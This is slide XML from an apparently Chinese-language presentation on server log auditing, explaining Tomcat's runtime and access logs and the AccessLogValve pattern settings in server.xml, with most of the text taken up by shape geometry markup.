                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器的日志审计方法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2412492" y="3209544"/>
            <a:ext cx="7157084" cy="1478280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="1478279">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704" y="1478279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147827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7907" y="3205264"/>
            <a:ext cx="7166609" cy="1487170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7161301" y="1486852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1486852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1486623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1485950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1484896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1483563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716606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477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="1483563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165149" y="1484896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164095" y="1485950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="1486623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1486852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="148717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7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="715653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7156538" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7166063" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7161301" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="9525" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7166063" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1482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452250"/>
            <a:ext cx="9198610" cy="317690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Tomcat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日志众多，主要分为两类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一是运行中的日志，它主要记录运行的一些信息，尤其是一些异常错误日志信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息</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="8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二是访问日志信息，它记录的访问的时间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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr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，访问的资料等相关信息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r>
              <a:rPr sz="1600" spc="16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localhost_acces.log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访问日志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conf/server.xml</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1863725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1705"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>运行日志</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1863725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运行日志：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spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>host-manager.2017-08-15.log</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1863725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运行日志：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="3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localhost.2017-08-15.log</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1863725" marR="2468245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访问日志</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>localhost_access_log.2017-08-15.txt  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>运行日志：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spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>manager.2017-08-15.log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4468" y="3811270"/>
            <a:ext cx="828040" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="828040" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="827531" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82753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827530" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1827530" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1827276" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182727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91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>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器访问日志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850" y="1597723"/>
            <a:ext cx="3932149" cy="298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访问日志（和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httpd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的类似）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051" y="2000948"/>
            <a:ext cx="10229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http://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7276" y="2366772"/>
            <a:ext cx="9537700" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192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21789" y="2362454"/>
            <a:ext cx="9547860" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="1764029">
                <a:moveTo>
                  <a:pt x="9542894" y="1763852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1763852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1761896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954765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754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="1761896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1764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1764029">
                <a:moveTo>
                  <a:pt x="953813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31" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1764029">
                <a:moveTo>
                  <a:pt x="9538131" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538131" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1764029">
                <a:moveTo>
                  <a:pt x="9547656" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542894" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1764029">
                <a:moveTo>
                  <a:pt x="9525" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1764029">
                <a:moveTo>
                  <a:pt x="9538131" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1764029">
                <a:moveTo>
                  <a:pt x="9547656" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538131" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="1759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5292" y="2388806"/>
            <a:ext cx="22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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="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7336" y="2032836"/>
            <a:ext cx="8591550" cy="201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tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Logging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600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6985">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Access log processes all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example.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6356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Documentation at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/docs/config/valve.html</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="63563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Note: The pattern used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equivalent to using pattern="common"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--&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762635" indent="-44450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&lt;Valve </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>className="org.apache.catalina.valves.AccessLogValve" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>directory="logs"  prefix="localhost_access_log."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suffix=".txt"</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76263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pattern="%h %l %u %t &amp;quot;%r&amp;quot; %s %b" /&gt;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276" y="4265676"/>
            <a:ext cx="9537700" cy="2032000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="2032000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="2031492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="203149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789" y="4260710"/>
            <a:ext cx="9547860" cy="2040889"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9542894" y="2040851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2040851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2040623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2039937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="2038883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2037562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954765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031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="2037562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="2038883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="2039937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="2040623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="2040851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="204088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2040889">
                <a:moveTo>
                  <a:pt x="953813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31" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9538131" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538131" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="2036089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9547656" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542894" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9525" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2036089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9538131" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538131" y="2036089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9547656" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538131" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542894" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547656" y="2036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27276" y="4287062"/>
            <a:ext cx="953770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pattern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项的修改，可以改变日志输出的内容。</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90170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该项值可以为：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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common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与</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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combined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，这两个预先设置好的格式对应的日志输出内容如下：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="901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common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的值：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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%h %l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%u %t %r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%s %b</a:t>
            </a:r>
            <a:endParaRPr sz="18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combined </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的值：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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%h %l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%u %t %r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%s %b %{Referer}i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%{User-Agent}i</a:t>
            </a:r>
            <a:endParaRPr sz="18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pattern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也可以根据需要自由组合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例如</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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pattern="%h %l"</a:t>
            </a:r>
            <a:endParaRPr sz="18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对于各</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>字段的含义请参照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53670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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Logging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39496" y="379659"/>
            <a:ext cx="9537700" cy="2032000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="2032000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="2031492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="203149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2196" y="315190"/>
            <a:ext cx="9547860" cy="2040889"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9542907" y="2040851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2040851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2040623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2039950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2038896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2037562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2036089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031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="2037562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="2038896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="2039950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="2040623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2040851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="204088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2040889">
                <a:moveTo>
                  <a:pt x="95381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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9538144" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2036089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9547669" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9525" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2036089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9538144" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2036089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2040889">
                <a:moveTo>
                  <a:pt x="9547669" y="2036089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2036089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2031326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2036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81800" y="370364"/>
            <a:ext cx="683260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访问的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
